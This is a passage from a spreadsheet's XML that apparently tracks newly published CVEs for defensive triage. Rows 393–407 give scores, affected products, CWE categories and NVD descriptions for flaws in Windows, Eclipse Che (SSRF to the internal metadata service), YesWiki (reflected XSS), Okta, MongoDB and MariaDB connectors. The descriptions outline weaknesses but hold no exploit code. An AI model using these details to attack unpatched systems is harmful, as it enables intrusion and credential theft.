        </is>
      </c>
      <c r="C393" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71338</t>
        </is>
      </c>
      <c r="D393" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E393" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F393" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G393" s="5" t="inlineStr"/>
      <c r="H393" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I393" s="5" t="inlineStr"/>
      <c r="J393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K393" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L393" s="5" t="inlineStr"/>
      <c r="M393" s="5" t="inlineStr"/>
      <c r="N393" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O393" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P393" s="5" t="inlineStr"/>
      <c r="Q393" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R393" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Failover Cluster allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S393" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71338</t>
        </is>
      </c>
    </row>
    <row r="394">
      <c r="A394" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B394" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C394" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77887</t>
        </is>
      </c>
      <c r="D394" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E394" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F394" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G394" s="5" t="inlineStr"/>
      <c r="H394" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I394" s="5" t="inlineStr"/>
      <c r="J394" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K394" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L394" s="5" t="inlineStr"/>
      <c r="M394" s="5" t="inlineStr"/>
      <c r="N394" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O394" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P394" s="5" t="inlineStr"/>
      <c r="Q394" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R394" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S394" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77887</t>
        </is>
      </c>
    </row>
    <row r="395">
      <c r="A395" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B395" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C395" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77891</t>
        </is>
      </c>
      <c r="D395" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E395" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F395" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G395" s="5" t="inlineStr"/>
      <c r="H395" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I395" s="5" t="inlineStr"/>
      <c r="J395" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K395" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L395" s="5" t="inlineStr"/>
      <c r="M395" s="5" t="inlineStr"/>
      <c r="N395" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O395" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P395" s="5" t="inlineStr"/>
      <c r="Q395" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R395" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S395" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77891</t>
        </is>
      </c>
    </row>
    <row r="396">
      <c r="A396" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B396" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C396" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86590</t>
        </is>
      </c>
      <c r="D396" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E396" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F396" s="5" t="inlineStr">
        <is>
          <t>emo@eclipse.org</t>
        </is>
      </c>
      <c r="G396" s="5" t="inlineStr"/>
      <c r="H396" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I396" s="5" t="inlineStr"/>
      <c r="J396" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="K396" s="5" t="inlineStr"/>
      <c r="L396" s="5" t="inlineStr"/>
      <c r="M396" s="5" t="inlineStr"/>
      <c r="N396" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O396" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P396" s="5" t="inlineStr"/>
      <c r="Q396" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R396" s="5" t="inlineStr">
        <is>
          <t>In Eclipse Che versions 7.79.0 through 7.121.0, the dashboard backend's POST /dashboard/api/data/resolver endpoint passes a caller-supplied URL directly to an outbound HTTP GET request with no host filtering. An authenticated user can exploit this server-side request forgery (SSRF) to read responses from internal network addresses, including the cloud instance metadata service (169.254.169.254), loopback interfaces, RFC-1918 private ranges, and in-cluster Kubernetes services. The operator-configured allowlist (spec.devEnvironments.allowedSources.urls) is not consulted. The vulnerability is fixed in version 7.122.0, which adds private-address blocking, IPv4-mapped IPv6 bypass prevention, operator allowlist enforcement, and disables HTTP redirects on the outbound request.</t>
        </is>
      </c>
      <c r="S396" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86590</t>
        </is>
      </c>
    </row>
    <row r="397">
      <c r="A397" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B397" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C397" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52773</t>
        </is>
      </c>
      <c r="D397" s="5" t="n">
        <v>6.1</v>
      </c>
      <c r="E397" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F397" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G397" s="5" t="inlineStr"/>
      <c r="H397" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I397" s="5" t="inlineStr"/>
      <c r="J397" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K397" s="5" t="inlineStr"/>
      <c r="L397" s="5" t="inlineStr"/>
      <c r="M397" s="5" t="inlineStr"/>
      <c r="N397" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O397" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P397" s="5" t="inlineStr"/>
      <c r="Q397" s="5" t="inlineStr">
        <is>
          <t>CWE-80</t>
        </is>
      </c>
      <c r="R397" s="5" t="inlineStr">
        <is>
          <t>YesWiki is a wiki system written in PHP. From version 4.1.0 to before version 4.6.6, YesWiki's archived-revision view reflects the time GET parameter into a hidden HTML input in handlers/page/show.php without escaping. Because MySQL coerces malformed DATETIME strings, an attacker can append HTML or JavaScript to a valid archived revision timestamp, still load that archived revision, and execute arbitrary JavaScript in the victim's browser. The vulnerable form is only rendered when the victim can both read and edit the target page. In restricted deployments this requires a victim with read and write access to that page. On a default doryphore 4.6.5 install, public pages such as PagePrincipale were editable anonymously during validation, so the issue can also affect unauthenticated visitors in that configuration. This issue has been patched in version 4.6.6.</t>
        </is>
      </c>
      <c r="S397" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52773</t>
        </is>
      </c>
    </row>
    <row r="398">
      <c r="A398" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B398" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C398" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78552</t>
        </is>
      </c>
      <c r="D398" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E398" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F398" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G398" s="5" t="inlineStr"/>
      <c r="H398" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I398" s="5" t="inlineStr"/>
      <c r="J398" s="5" t="inlineStr">
        <is>
          <t>nginx, okta</t>
        </is>
      </c>
      <c r="K398" s="5" t="inlineStr"/>
      <c r="L398" s="5" t="inlineStr"/>
      <c r="M398" s="5" t="inlineStr"/>
      <c r="N398" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O398" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P398" s="5" t="inlineStr"/>
      <c r="Q398" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="R398" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not apply its Lua directive restriction to the application-level custom configuration field. The field is interpolated directly into the nginx server block without inspection, resulting in execution of injected directives.</t>
        </is>
      </c>
      <c r="S398" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78552</t>
        </is>
      </c>
    </row>
    <row r="399">
      <c r="A399" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B399" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C399" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78622</t>
        </is>
      </c>
      <c r="D399" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E399" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F399" s="5" t="inlineStr">
        <is>
          <t>psirt@okta.com</t>
        </is>
      </c>
      <c r="G399" s="5" t="inlineStr"/>
      <c r="H399" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I399" s="5" t="inlineStr"/>
      <c r="J399" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="K399" s="5" t="inlineStr"/>
      <c r="L399" s="5" t="inlineStr"/>
      <c r="M399" s="5" t="inlineStr"/>
      <c r="N399" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O399" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P399" s="5" t="inlineStr"/>
      <c r="Q399" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R399"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S399" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78622</t>
        </is>
      </c>
    </row>
    <row r="400">
      <c r="A400" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B400" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C400" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82056</t>
        </is>
      </c>
      <c r="D400" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E400" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F400" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G400" s="5" t="inlineStr"/>
      <c r="H400" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I400" s="5" t="inlineStr"/>
      <c r="J400" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K400" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L400" s="5" t="inlineStr"/>
      <c r="M400" s="5" t="inlineStr"/>
      <c r="N400" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O400" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P400" s="5" t="inlineStr"/>
      <c r="Q400" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R400" s="5" t="inlineStr">
        <is>
          <t>A race condition in MongoDB server's text index query parsing can cause a heap use-after-free read when handling upsert retry paths. Under certain concurrent index lifecycle operations, a raw pointer to internal text index metadata may be dereferenced after the underlying structures have been freed, leading to a server crash. An authenticated user with readWrite privileges can trigger this condition through specific concurrent text-search and index management operations, resulting in denial of service for all connected clients. This</t>
        </is>
      </c>
      <c r="S400" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82056</t>
        </is>
      </c>
    </row>
    <row r="401">
      <c r="A401" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B401" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C401" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82063</t>
        </is>
      </c>
      <c r="D401" s="5" t="n">
        <v>6</v>
      </c>
      <c r="E401" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F401" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G401" s="5" t="inlineStr"/>
      <c r="H401" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I401" s="5" t="inlineStr"/>
      <c r="J401" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K401" s="5" t="inlineStr">
        <is>
          <t>mongodb:mongodb</t>
        </is>
      </c>
      <c r="L401" s="5" t="inlineStr"/>
      <c r="M401" s="5" t="inlineStr"/>
      <c r="N401" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O401" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P401" s="5" t="inlineStr"/>
      <c r="Q401" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R401" s="5" t="inlineStr">
        <is>
          <t>A use-after-free security issue in the cursor management component of MongoDB Server allows an authenticated user to cause a denial of service. Under specific timing conditions during cursor operations, a stale pointer to a freed resource may be retained and subsequently dereferenced during cursor cleanup, leading to a server process crash.</t>
        </is>
      </c>
      <c r="S401" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82063</t>
        </is>
      </c>
    </row>
    <row r="402">
      <c r="A402" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B402" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C402" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55854</t>
        </is>
      </c>
      <c r="D402" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E402" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F402" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G402" s="5" t="inlineStr"/>
      <c r="H402" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I402" s="5" t="inlineStr"/>
      <c r="J402" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K402" s="5" t="inlineStr"/>
      <c r="L402" s="5" t="inlineStr"/>
      <c r="M402" s="5" t="inlineStr"/>
      <c r="N402" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O402" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P402" s="5" t="inlineStr"/>
      <c r="Q402" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="R402" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/Node.js is used to connect applications developed on Node.js to MariaDB and MySQL databases. Prior to 3.2.4, 3.3.3, 3.4.6, and 3.5.3, MariaDB Connector/Node.js can disclose an account password when PAM dialog authentication is negotiated over an insecure transport. In lib/cmd/handshake/auth/pam-password-auth.js and lib/cmd/handshake/authentication.js, the SendPamAuthPacketFactory behavior for the server-side plugin dialog lacked the secure-transport gate applied to mysql_clear_password. With the default sslMode=DISABLE and restrictedAuth=null settings, a hostile or on-path server can send an Authentication Switch Request for dialog over plain TCP, causing the connector to return the account password in cleartext. Properly verified TLS and a local Unix socket prevent this path, while fingerprint-only server identity validation is not sufficient. This issue is fixed in versions 3.2.4, 3.3.3, 3.4.6, and 3.5.3.</t>
        </is>
      </c>
      <c r="S402" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55854</t>
        </is>
      </c>
    </row>
    <row r="403">
      <c r="A403" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B403" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C403" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55856</t>
        </is>
      </c>
      <c r="D403" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E403" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F403" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G403" s="5" t="inlineStr"/>
      <c r="H403" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I403" s="5" t="inlineStr"/>
      <c r="J403" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K403" s="5" t="inlineStr"/>
      <c r="L403" s="5" t="inlineStr"/>
      <c r="M403" s="5" t="inlineStr"/>
      <c r="N403" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O403" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P403" s="5" t="inlineStr"/>
      <c r="Q403" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="R403" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, when a Java application connects with sslMode=verify-full or sslMode=verify-ca, supplies a password, and does not configure serverSslCert or trustStore, Connector/J can accept an untrusted self-signed certificate through the fallbackToSystemTrustStore=true ephemeral trust manager and record its certFingerprint for later identity binding. The OK-packet and authentication-switch paths enforce the certificate fingerprint, but the initial-handshake path does not. HandshakeResponse.encode() can therefore build and send a mysql_clear_password response before checking certFingerprint != null &amp;&amp; !isMitMProof(), sslMode, or whether the authentication plugin is resistant to a man-in-the-middle, and the initial path also bypasses restrictedAuth. An active man-in-the-middle or hostile server can present a self-signed certificate, claim to be MariaDB, select mysql_clear_password as the initial authentication plugin, and receive the full database password before the connection is rejected. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="S403" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55856</t>
        </is>
      </c>
    </row>
    <row r="404">
      <c r="A404" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B404" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C404" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55857</t>
        </is>
      </c>
      <c r="D404" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E404" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F404" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G404" s="5" t="inlineStr"/>
      <c r="H404" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I404" s="5" t="inlineStr"/>
      <c r="J404" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K404" s="5" t="inlineStr"/>
      <c r="L404" s="5" t="inlineStr"/>
      <c r="M404" s="5" t="inlineStr"/>
      <c r="N404" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O404" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P404" s="5" t="inlineStr"/>
      <c r="Q404" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="R404" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, PAM dialog authentication can be coerced into transmitting the account password over an insecure connection. The mysql_clear_password plugin is gated behind a secure transport, but the sibling PAM handler SendPamAuthPacketFactory, named dialog by the server, does not declare that requirement and inherits the default secure-required value false; older branches implement the same affected behavior in SendPamAuthPacket. A hostile or man-in-the-middle server can send an Authentication Switch Request for dialog over plain TCP, causing the driver to return the user's password in cleartext when sslMode=DISABLE and restrictedAuth=null, which is the default configuration. Properly verified TLS and local Unix sockets are not exposed to this transport vector. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="S404" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55857</t>
        </is>
      </c>
    </row>
    <row r="405">
      <c r="A405" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B405" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C405" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55858</t>
        </is>
      </c>
      <c r="D405" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E405" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F405" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G405" s="5" t="inlineStr"/>
      <c r="H405" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I405" s="5" t="inlineStr"/>
      <c r="J405" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K405" s="5" t="inlineStr"/>
      <c r="L405" s="5" t="inlineStr"/>
      <c r="M405" s="5" t="inlineStr"/>
      <c r="N405" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O405" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P405" s="5" t="inlineStr"/>
      <c r="Q405" s="5" t="inlineStr">
        <is>
          <t>CWE-838</t>
        </is>
      </c>
      <c r="R405" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/J is used to connect applications developed in Java to MariaDB and MySQL databases. Prior to 2.7.14, 3.3.5, 3.4.3, and 3.5.9, the connector encodes and decodes protocol text and performs client-side escaping under the assumption that the connection character set is UTF-8. The server can report a mid-session change to character_set_client through OK-packet session-state tracking, including a change caused by SET NAMES, a stored routine or trigger, server configuration, or a hostile server. If character_set_client changes to a non-UTF-8 value, the driver continues to read and write UTF-8 while the server interprets the same bytes under another encoding, causing silent data corruption and a client/server charset-confusion mismatch that can defeat byte-wise quoting or escaping. The fix accepts only utf8, utf8mb3, or utf8mb4 after initialization; any other value causes SQLException with SQLState 08000 and closes the connection. This issue is fixed in versions 2.7.14, 3.3.5, 3.4.3, and 3.5.9.</t>
        </is>
      </c>
      <c r="S405" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55858</t>
        </is>
      </c>
    </row>
    <row r="406">
      <c r="A406" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B406" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C406" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55859</t>
        </is>
      </c>
      <c r="D406" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E406" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F406" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G406" s="5" t="inlineStr"/>
      <c r="H406" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I406" s="5" t="inlineStr"/>
      <c r="J406" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K406" s="5" t="inlineStr"/>
      <c r="L406" s="5" t="inlineStr"/>
      <c r="M406" s="5" t="inlineStr"/>
      <c r="N406" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O406" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P406" s="5" t="inlineStr"/>
      <c r="Q406" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-838</t>
        </is>
      </c>
      <c r="R406" s="5" t="inlineStr">
        <is>
          <t>MariaDB Connector/R2DBC is a non-blocking MariaDB and MySQL client implemented in Java. Prior to 1.4.1, org.mariadb:r2dbc-mariadb encodes and decodes all character data under the assumption that the connection character set is UTF-8. A server can announce a mid-session change to character_set_client through the OK-packet session-state-tracking mechanism, including through SET NAMES executed by a stored routine or trigger, server configuration, or a hostile or man-in-the-middle server. If the new character set is not UTF-8, the driver continues to exchange UTF-8 while the server interprets the same bytes under a different encoding, causing silent data corruption and a client/server charset-confusion mismatch that can defeat byte-wise quoting or escaping. The fix accepts only utf8, utf8mb3, or utf8mb4 after initialization; any other value raises R2dbcNonTransientResourceException with SQLState 08000 and closes the connection. This issue is fixed in version 1.4.1.</t>
        </is>
      </c>
      <c r="S406" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55859</t>
        </is>
      </c>
    </row>
    <row r="407">
      <c r="A407" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B407" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C407" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55860</t>
        </is>
      </c>
      <c r="D407" s="5" t="n">
        <v>5.9</v>
      </c>
      <c r="E407" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F407" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G407" s="5" t="inlineStr"/>
      <c r="H407" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I407" s="5" t="inlineStr"/>
      <c r="J407" s="5" t="inlineStr">
        <is>
          <t>mysql</t>
        </is>
      </c>
      <c r="K407" s="5" t="inlineStr"/>
      <c r="L407" s="5" t="inlineStr"/>
      <c r="M407" s="5" t="inlineStr"/>
      <c r="N407" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O407" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P407" s="5" t="inlineStr"/>
      <c r="Q407" s="5" t="inlineStr">
        <is>
          <t>CWE-319, CWE-522</t>
        </is>
      </c>
      <c r="R407" s="5" t="inlineStr">
        <is>
